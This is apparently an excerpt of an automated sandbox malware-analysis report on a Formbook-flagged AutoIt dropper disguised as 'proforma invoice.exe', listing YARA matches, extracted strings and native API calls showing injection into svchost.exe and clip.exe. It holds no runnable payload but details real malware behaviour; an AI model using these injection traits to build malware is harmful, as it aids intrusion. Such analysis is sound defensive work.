            Source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: proforma invoice.exe String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: proforma invoice.exe, 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_54ff3714-2
            Source: proforma invoice.exe, 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_87820256-0
            Source: proforma invoice.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b08aa060-7
            Source: proforma invoice.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_e5e37191-b
            Source: initial sample Static PE information: Filename: proforma invoice.exe
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042AFF3 NtClose,1_2_0042AFF3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,1_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03274340 NtSetContextThread,1_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03274650 NtSuspendThread,1_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272AD0 NtReadFile,1_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272F30 NtCreateSection,1_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272FE0 NtCreateFile,1_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272EA0 NtAdjustPrivilegesToken,1_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272C60 NtCreateKey,1_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272CA0 NtQueryInformationToken,1_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03273090 NtSetValueKey,1_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03273D70 NtOpenThread,1_2_03273D70
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA4650 NtSuspendThread,LdrInitializeThunk,3_2_04FA4650
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA4340 NtSetContextThread,LdrInitializeThunk,3_2_04FA4340
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04FA2CA0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04FA2C70
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2C60 NtCreateKey,LdrInitializeThunk,3_2_04FA2C60
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04FA2DF0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2DD0 NtDelayExecution,LdrInitializeThunk,3_2_04FA2DD0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04FA2D30
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04FA2D10
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04FA2EE0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04FA2E80
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2FE0 NtCreateFile,LdrInitializeThunk,3_2_04FA2FE0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2FB0 NtResumeThread,LdrInitializeThunk,3_2_04FA2FB0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2F30 NtCreateSection,LdrInitializeThunk,3_2_04FA2F30
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2AF0 NtWriteFile,LdrInitializeThunk,3_2_04FA2AF0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2AD0 NtReadFile,LdrInitializeThunk,3_2_04FA2AD0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04FA2BF0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04FA2BE0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04FA2BA0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2B60 NtClose,LdrInitializeThunk,3_2_04FA2B60
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA35C0 NtCreateMutant,LdrInitializeThunk,3_2_04FA35C0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA39B0 NtGetContextThread,LdrInitializeThunk,3_2_04FA39B0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2CF0 NtOpenProcess,3_2_04FA2CF0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2CC0 NtQueryVirtualMemory,3_2_04FA2CC0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2C00 NtQueryInformationProcess,3_2_04FA2C00
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2DB0 NtEnumerateKey,3_2_04FA2DB0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2D00 NtSetInformationFile,3_2_04FA2D00
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2EA0 NtAdjustPrivilegesToken,3_2_04FA2EA0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2E30 NtWriteVirtualMemory,3_2_04FA2E30
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2FA0 NtQuerySection,3_2_04FA2FA0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2F90 NtProtectVirtualMemory,3_2_04FA2F90
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2F60 NtCreateProcessEx,3_2_04FA2F60
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2AB0 NtWaitForSingleObject,3_2_04FA2AB0
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA2B80 NtQueryInformationFile,3_2_04FA2B80
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA3090 NtSetValueKey,3_2_04FA3090
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA3010 NtOpenDirectoryObject,3_2_04FA3010
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA3D70 NtOpenThread,3_2_04FA3D70
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_04FA3D10 NtOpenProcessToken,3_2_04FA3D10
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_03067B40 NtCreateFile,3_2_03067B40
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_03067F90 NtAllocateVirtualMemory,3_2_03067F90
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_03067E30 NtClose,3_2_03067E30
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_03067D90 NtDeleteFile,3_2_03067D90
            Source: C:\Windows\SysWOW64\clip.exe Code function: 3_2_03067CA0 NtReadFile,3_2_03067CA0
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B0D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00B0D5EB
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B01201
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B0E8F6
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AA8060 0_2_00AA8060
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B12046 0_2_00B12046
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B08298 0_2_00B08298
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00ADE4FF 0_2_00ADE4FF
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AD676B 0_2_00AD676B
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B34873 0_2_00B34873
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00ACCAA0 0_2_00ACCAA0
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AACAF0 0_2_00AACAF0
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00ABCC39 0_2_00ABCC39
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AD6DD9 0_2_00AD6DD9
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00ABD064 0_2_00ABD064
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AA91C0 0_2_00AA91C0
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00ABB119 0_2_00ABB119
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC1394 0_2_00AC1394
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC1706 0_2_00AC1706
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC781B 0_2_00AC781B
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC19B0 0_2_00AC19B0
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AA7920 0_2_00AA7920
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AB997D 0_2_00AB997D
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC7A4A 0_2_00AC7A4A
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC7CA7 0_2_00AC7CA7
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC1C77 0_2_00AC1C77
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AD9EEE 0_2_00AD9EEE
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B2BE44 0_2_00B2BE44
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC1F32 0_2_00AC1F32
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_02103650 0_2_02103650
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004011C0 1_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004021A5 1_2_004021A5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004021B0 1_2_004021B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FACB 1_2_0040FACB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FAD3 1_2_0040FAD3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402320 1_2_00402320
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004023BC 1_2_004023BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042D443 1_2_0042D443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416433 1_2_00416433
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FCF3 1_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040DD73 1_2_0040DD73
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402F50 1_2_00402F50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FA352 1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E3F0 1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033003E6 1_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C02C0 1_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230100 1_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DA118 1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C8158 1_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033001AA 1_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F81CC 1_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03264750 1_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323C7C0 1_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325C6E0 1_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240535 1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03300591 1_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E4420 1_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F2446 1_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EE4F6 1_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FAB40 1_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F6BD7 1_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03256962 1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0330A9A6 1_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324A840 1_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03242840 1_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032268B8 1_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E8F0 1_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03282F28 1_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03260F30 1_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E2F30 1_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B4F40 1_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BEFA0 1_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03232FC8 1_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FEE26 1_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240E59 1_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03252E90 1_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FCE93 1_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FEEDB 1_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324AD00 1_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DCD1F 1_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03258DBF 1_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323ADE01_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240C001_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0CB51_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230CF21_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F132D1_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322D34C1_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0328739A1_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032452A01_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E12ED1_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325D2F01_2_0325D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B2C01_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327516C1_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322F1721_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330B16B1_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324B1B01_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F70E91_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF0E01_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EF0CC1_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032470C01_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF7B01_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F16CC1_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F75711_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DD5B01_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF43F1_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032314601_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFB761_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FB801_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B5BF01_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327DBF91_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B3A6C1_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFA491_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7A461_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DDAAC1_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03285AA01_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E1AA31_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EDAC61_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D59101_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032499501_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B9501_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AD8001_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032438E01_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFF091_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFFB11_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03241F921_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD21_2_03203FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD51_2_03203FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03249EB01_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7D731_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03243D401_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F1D5A1_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FDC01_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B9C321_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFCF21_2_032FFCF2
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05030591
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05014420
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05022446
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F70535
